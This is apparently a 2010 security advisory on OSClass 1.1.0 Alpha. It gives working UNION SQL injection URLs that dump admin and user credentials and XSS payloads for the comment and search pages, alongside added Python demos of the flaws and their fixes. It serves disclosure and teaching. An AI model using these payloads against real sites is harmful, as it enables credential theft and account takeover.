Open Source Classifieds 1.1.0 Alpha Cross Site Scripting / SQL Injection

2010-02-19T00:00:00
ID PACKETSTORM:86461
Type packetstorm
Reporter Sioma Labs
Modified 2010-02-19T00:00:00

Description

========================================================================================  
Open Source Classifieds (OSClass) SQL Injection / XSS - Multiple Vulnerabilities  
----------------------------------------------------------------------------------------  
- Site : http://osclass.org/   
- Download : http://sourceforge.net/projects/osclass/files/  
- Author : Sioma Labs  
- Version : 1.1.0 Alpha  
- Tested on : Windows XP SP2 (WAMP)  
  
[-------------------------------------------------------------------------------------------------------------------------]  
  
MySQL Injection   
===============  
The id parameter of item.php is placed straight into the item query. The query returns seven columns, so a UNION needs six filler values plus a seventh column that carries the data being extracted.  
POC  
http://localhost/item.php?id=[SQLi]  
  
Basic Info  
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--  
  
Admin ID, Username, Password (table oc_admin)  
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_admin--  
  
User ID, Username, Password (table oc_user)  
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--  
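
The following is an added example, not OSClass code, that replays the UNION-based extraction above against an SQLite stand-in. The oc_item column layout, the admin/user rows and the hashes are constructed for the demo; only the table names and the shape of the payloads come from the advisory. MySQL-only pieces (version(), user(), 0x3a, multi-argument group_concat) are swapped for SQLite equivalents, and the column-count probe shows where the "1,2,3,4,5,6" filler comes from. The last function is the parameterised query that closes the hole.

```python
"""Added example (not OSClass code): UNION injection against an SQLite
stand-in for item.php's query, plus the parameterised fix.

Assumptions (constructed for the demo): oc_item has seven columns, and the
oc_admin / oc_user tables hold one row each with made-up hashes."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed schema; only the table names come from the advisory."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE oc_item (id INTEGER, title TEXT, description TEXT,
                              price TEXT, category TEXT,
                              contact_name TEXT, contact_email TEXT);
        INSERT INTO oc_item VALUES (1, 'Bike', 'Red road bike', '120',
                                    'Sport', 'Ann', 'ann@example.test');
        CREATE TABLE oc_admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO oc_admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        CREATE TABLE oc_user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO oc_user VALUES (7, 'bob', 'e10adc3949ba59abbe56e057f20f883e');
        """
    )
    return con


def item_vulnerable(con: sqlite3.Connection, raw_id: str) -> list:
    """Mirrors the advisory's PoC: the id parameter is pasted into the SQL text."""
    sql = "SELECT * FROM oc_item WHERE id = %s" % raw_id
    return con.execute(sql).fetchall()


def item_fixed(con: sqlite3.Connection, raw_id: str) -> list:
    """Hardened form: reject anything that is not an integer, then bind it."""
    try:
        item_id = int(raw_id)
    except ValueError:
        return []
    return con.execute("SELECT * FROM oc_item WHERE id = ?", (item_id,)).fetchall()


def find_column_count(con: sqlite3.Connection, limit: int = 20):
    """Probe with growing NULL lists until the UNION stops erroring.

    This is why the advisory's payloads carry six literals plus one
    data-bearing column: the item query has seven result columns."""
    for n in range(1, limit + 1):
        payload = "-1 UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            item_vulnerable(con, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# SQLite renderings of the three advisory payloads. version()/user() become
# sqlite_version(); 0x3a becomes ':' and multi-arg group_concat becomes ||.
INFO_PAYLOAD = "-1 UNION SELECT 1,2,3,4,5,6,sqlite_version()--"
ADMIN_PAYLOAD = ("-1 UNION SELECT 1,2,3,4,5,6,"
                 "group_concat(id||':'||username||':'||password) FROM oc_admin--")
USER_PAYLOAD = ("-1 UNION SELECT 1,2,3,4,5,6,"
                "group_concat(id||':'||username||':'||password) FROM oc_user--")


def leak(con: sqlite3.Connection, payload: str):
    """Return whatever landed in the seventh (data-bearing) column, or None."""
    rows = item_vulnerable(con, payload)
    return rows[0][-1] if rows else None


if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    print("info   :", leak(db, INFO_PAYLOAD))
    print("admin  :", leak(db, ADMIN_PAYLOAD))
    print("user   :", leak(db, USER_PAYLOAD))
    print("fixed  :", item_fixed(db, ADMIN_PAYLOAD))
```

Binding the id as an integer is the whole fix; the UNION text never reaches the SQL parser, so the column-count probe and the group_concat extraction both die at the int() conversion.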
  
[-------------------------------------------------------------------------------------------------------------------------]  
Cross Site Scripting  
====================  
  
XSS Source Review (item.php)  
------------------------------  
  
1st XSS: item.php (stored, via the comment form)  
[+] For this to work you need an item already posted (http://localhost/item.php?action=post), since a comment is attached to an existing item id.  
------------------------------  
case 'add_comment':  
// author_name, author_email and body are written exactly as submitted;  
// nothing in this path encodes them before they are shown again on the item page  
dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')",   
DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);  
header('Location: item.php?id=' . $_POST['id']);  
break;  
case 'post':  
------------------------------  
  
[+] Submit this payload in the comment box (the leading "> closes the surrounding attribute before the script tag)  
"><script>alert(String.fromCharCode(88, 83, 83));</script>  
  
-------------------------------  
  
2nd XSS: search.php (reflected, pattern parameter)  
---------------------------------  
$pattern = $_GET['pattern'];  
--------------------------------  
  
POC  
http://localhost/search.php?pattern=[Xss]  
Exploit  
http://localhost/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>  
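
Added example, not OSClass code, covering both XSS sinks above: it shows why the comment payload starts with "> and how output encoding neutralises both the stored comment body and the reflected search pattern. The HTML fragments are constructed stand-ins for the rendering side of item.php and search.php, which the advisory only quotes on the input side; the tag walk uses html.parser to check whether a browser-like parser would actually see a script element.

```python
"""Added example (not OSClass code): the advisory's two XSS payloads rendered
through constructed, unencoded and encoded sinks.

Assumptions: the comment body lands inside an attribute value (hence the
leading "> in the payload); the search pattern is echoed as element text."""
import html
from html.parser import HTMLParser

COMMENT_PAYLOAD = '"><script>alert(String.fromCharCode(88, 83, 83));</script>'
SEARCH_PAYLOAD = '<script>alert(String.fromCharCode(88, 83, 83));</script>'


def render_comment_vulnerable(body: str) -> str:
    """Constructed sink: stored body reused as an attribute value, unencoded."""
    return '<input type="text" name="body" value="%s">' % body


def render_comment_fixed(body: str) -> str:
    """quote=True also encodes " and ', so the attribute cannot be closed early."""
    return '<input type="text" name="body" value="%s">' % html.escape(body, quote=True)


def render_search_vulnerable(pattern: str) -> str:
    """Constructed sink: $_GET['pattern'] echoed straight into element text."""
    return "<p>Results for: %s</p>" % pattern


def render_search_fixed(pattern: str) -> str:
    return "<p>Results for: %s</p>" % html.escape(pattern, quote=True)


class TagCollector(HTMLParser):
    """Records the start tags a parser sees; encoded text never becomes a tag."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_tags(markup: str) -> list:
    """Tag names a parser produces for the fragment, in document order."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def has_script_element(markup: str) -> bool:
    return "script" in element_tags(markup)


if __name__ == "__main__":
    for label, markup in (
        ("comment vulnerable", render_comment_vulnerable(COMMENT_PAYLOAD)),
        ("comment fixed     ", render_comment_fixed(COMMENT_PAYLOAD)),
        ("search vulnerable ", render_search_vulnerable(SEARCH_PAYLOAD)),
        ("search fixed      ", render_search_fixed(SEARCH_PAYLOAD)),
    ):
        print(label, element_tags(markup), markup)
```

In the unencoded comment sink the first two characters of the payload terminate the value attribute and the input tag, so the parser emits a second element, script; after html.escape the same bytes are attribute text and the only element is input. The search sink needs no attribute breakout because the pattern is already in text context, which is why that payload has no leading ">.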
  
[-------------------------------------------------------------------------------------------------------------------------]  
  
# http://siomalabs.com [Sioma Labs]  
# Sioma Agent 154  